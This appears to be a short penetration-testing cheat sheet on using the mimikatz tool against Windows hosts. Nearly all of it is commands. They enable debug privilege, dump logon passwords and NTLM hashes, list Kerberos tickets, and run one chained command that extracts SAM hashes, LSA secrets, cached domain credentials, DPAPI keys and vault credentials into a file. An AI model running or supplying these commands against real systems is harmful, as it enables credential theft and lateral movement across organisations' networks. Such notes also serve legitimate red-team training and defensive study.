mimikatz Tool
Fetching Cached AD Credentials
Run all Command
dcsync attack
Last updated
Last updated
# To run mimikatz we need system user access.
# below are the command that we can use in mimikartz
# you can clone mimikatz from above git repo.
git clone https://github.com/ParrotSec/mimikatz
# or search in kali linux
locate mimikatz.exe
# to engage the SeDebugPrivlege8 privilege, which will allow us to interact with a process owned by another account.
privilege::debug
# dump hashes for all users logged on to the current workstation or server, including remote logins like Remote Desktop sessions
sekurlsa::logonpasswords
# From here we can find NTLM hash which can be used to connect to the system later.
# When WDigest is enabled, running Mimikatz will reveal cleartext passwords alongside the password hashes.
-------------------------
# Other way:
# Example:
# List smb share.
dir \\web04.corp.com\backup
# Ticket will be generated and saved. We can fatch the ticket using below command:
sekurlsa::tickets
cmd.exe /c "mimikatz.exe privilege::debug token::elevate sekurlsa::logonpasswords exit > output.txt".\mimikatz.exe "privilege::debug" "token::elevate" "log" "lsadump::sam /patch" "lsadump::sam" "sekurlsa::msv" "lsadump::secrets" "lsadump::lsa" "lsadump::lsa /patch" "lsadump::cache" "sekurlsa::logonpasswords full" "sekurlsa::ekeys" "sekurlsa::dpapi" "sekurlsa::credman" "vault::list" "vault::cred /patch" "exit"